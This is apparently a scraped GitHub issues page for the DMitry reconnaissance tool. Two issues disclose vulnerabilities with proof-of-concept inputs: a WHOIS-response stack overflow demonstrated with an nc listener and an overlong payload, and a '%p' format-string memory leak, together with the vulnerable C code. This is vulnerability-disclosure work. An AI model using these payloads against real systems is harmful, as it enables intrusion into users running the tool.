jaygreig86 / dmitry Goto Github PK

View Code? Open in Web Editor NEW

185.0 185.0 44.0 109 KB

DMitry (Deepmagic Information Gathering Tool)

Home Page: http://www.mor-pah.net

License: GNU General Public License v2.0

C 100.00%

dmitry's People

Contributors

Stargazers

Watchers

Forkers

toysweet mgcfish jijicanyu killsap rajkumarmagar nalcorpallhat magnom2728 subzeroking karthiksripal seabreg rejahrehim natrix-fork wigums paalpe89 bemonolit dandycheung aunghtet008900 shizonic jonorm archanjo7 securityanalysts 5l1v3r1 showdownbandit007 kamaal44 klayklay902 carter-yagemann ktzgraph optionalg rodrigogalhardo tommalvoriddle farial-mahmod bowman03 hartl3y94 sashka3076 jgoodacre93 madapro jrandomsage liudoublez d4rkusxx hacktrackgnulinux agdfl

dmitry's Issues

Segfault on specific domains

Did not dig into it, but some domains - like pftech.xyz provokes segmentation fault

Remote Stack Overflow (possible RCE)

Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.

This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.

PoC:

For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:

127.0.0.1       Af.whois-servers.net

Next, I use nc to act as the WHOIS server:

echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43

While that's running, let's see what happens in DMitry:

$ gdb ./dmitry 
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf

Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU

Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141		if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0  0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1  0x4141555555557dfc in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x41417fffffffe240 in ?? ()
#4  0x4e206e69616d6f44 in ?? ()
#5  0x6f6f66203a656d61 in ?? ()
#6  0x206e69616d6f440a in ?? ()
#7  0x203a737574617453 in ?? ()
#8  0x414141410a726162 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]

Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.

Add versioned tag

Would it be possible to create a release for 1.3a?

Format String Vulnerability (Arbitrary Read/Write, possible Arbitrary Code Execution)

I realize this repository is no longer being actively maintained, but for those who still find the program useful, be aware that there is a serious format string vulnerability, so please carefully validate your inputs!

PoC:

$ ./dmitry "%p %p %p %p %p %p"

Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for %p %p %p %p %p %p
Continuing with limited modules
HostIP:
HostName:%p %p %p %p %p %p

Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)
[...]

A maliciously crafted input can achieve arbitrary read/write, potentially leading to arbitrary code execution.

Root Cause:

The function get_nwhois passes linebuff, which contains content from the command line, to print_line:

dmitry/src/nwhois.c

Lines 3 to 28 in 5ad492c

    
           int get_nwhois(char *host) 
        
           { 
        
           	int hostn; 
        
           	char fhost[128];	/* Host with www removed */ 
        
           	char linebuff[128]; 
        
           	char server[64]; 
        
           	int ctr; 
        
           	linetodo = 0; 
        
           	if ( strlen(outputfile) ) file_open(); 
        
                   /* remove www. */ 
        
           	memset(fhost, '\0', sizeof(fhost)); 
        
                   if ( host[0] == 'w' && host[1] == 'w' && host[2] == 'w' && host[3] == '.'&& strlen(host) > 9 ) { 
        
                           ctr = 4; 
        
                           do { 
        
                           if ( host[ctr] != '\n' && host[ctr] != '\0' ) fhost[ctr-4] = host[ctr]; 
        
                           ctr++; 
        
                           } while ( host[ctr] != '\n' && host[ctr] != '\0' ); 
        
                   } 
        
                   else strcpy(fhost, host); 
        
           	/* Print introduction to function */ 
        
           	memset(linebuff, '\0', sizeof(linebuff)); 
        
           	snprintf(linebuff, sizeof(linebuff), "\nGathered Inic-whois information for %s\n", fhost); 
        
           	print_line(linebuff);

This eventually reaches printf as the format string argument:

dmitry/src/output.c

Lines 3 to 29 in 5ad492c

    
           void print_line(char *string, char *string2) 
        
           { 
        
           	int ctr; 
        
           	int ctr2; 
        
           	char sendbuff[255]; 
        
           	char timebuff[5]; 
        
           	char timebuff2[5]; 
        
           	struct tm *timenow; 
        
           	time_t now; 
        
           	if ( strlen(outputfile) ){ 
        
           		memset(sendbuff, '\0', sizeof(sendbuff)); 
        
           		ctr = 0; 
        
           		ctr2 = 0; 
        
                           do { 
        
                                   if ( string[ctr] == '%' && string[ctr + 1] == 's' ){ 
        
           				strcat(sendbuff, string2); 
        
           				ctr += 2; 
        
                                   } 
        
                                   sendbuff[strlen(sendbuff)] = string[ctr]; 
        
                                   ctr ++; 
        
                           } while ( string[ctr] != '\0' ); 
        
           		fputs(sendbuff, wfp); 
        
           	} 
        
           	printf(string, string2);

This is a very unsafe usage of printf.

* Buffer overflow detected *:dmitry terminated error.

I get the following error when I issue the following command. The error generated in the middle of the process.

dmitry -winsepo hackthissite.txt hackthissite.org

Error:

*** buffer overflow detected ***: dmitry terminated
Segmentation fault

Segmentation Fault when reading banner

I'm trying to read banners from a host in my local network and came across this problem.

System: Linux kali 6.0.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.10-2kali1 (2022-12-06) x86_64 GNU/Linux, VM running on VirtualBox

Version: DMitry/1.3a (Unix)

Error: zsh: segmentation fault dmitry -bp 192.168.15.1

Support for Windows.

@jaygreig86 Can you make dmitry can run in Windows?

dmitry looping error in kali linux arm64 version

Whenever i scan a domain its keep on looping please fix the issue.

jaygreig86 / dmitry Goto Github PK

dmitry's People

Contributors

Stargazers

Watchers

Forkers

dmitry's Issues

Segfault on specific domains

Remote Stack Overflow (possible RCE)

Add versioned tag

Format String Vulnerability (Arbitrary Read/Write, possible Arbitrary Code Execution)

* Buffer overflow detected *:dmitry terminated error.

Segmentation Fault when reading banner

Support for Windows.

dmitry looping error in kali linux arm64 version

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

	int get_nwhois(char *host)
	{
	int hostn;
	char fhost[128]; /* Host with www removed */
	char linebuff[128];
	char server[64];

	int ctr;
	linetodo = 0;
	if ( strlen(outputfile) ) file_open();

	/* remove www. */
	memset(fhost, '\0', sizeof(fhost));
	if ( host[0] == 'w' && host[1] == 'w' && host[2] == 'w' && host[3] == '.'&& strlen(host) > 9 ) {
	ctr = 4;
	do {
	if ( host[ctr] != '\n' && host[ctr] != '\0' ) fhost[ctr-4] = host[ctr];
	ctr++;
	} while ( host[ctr] != '\n' && host[ctr] != '\0' );
	}
	else strcpy(fhost, host);

	/* Print introduction to function */
	memset(linebuff, '\0', sizeof(linebuff));
	snprintf(linebuff, sizeof(linebuff), "\nGathered Inic-whois information for %s\n", fhost);
	print_line(linebuff);

	void print_line(char string, char string2)
	{
	int ctr;
	int ctr2;
	char sendbuff[255];
	char timebuff[5];
	char timebuff2[5];
	struct tm *timenow;
	time_t now;

	if ( strlen(outputfile) ){
	memset(sendbuff, '\0', sizeof(sendbuff));
	ctr = 0;
	ctr2 = 0;
	do {
	if ( string[ctr] == '%' && string[ctr + 1] == 's' ){
	strcat(sendbuff, string2);
	ctr += 2;
	}
	sendbuff[strlen(sendbuff)] = string[ctr];
	ctr ++;
	} while ( string[ctr] != '\0' );

	fputs(sendbuff, wfp);
	}

	printf(string, string2);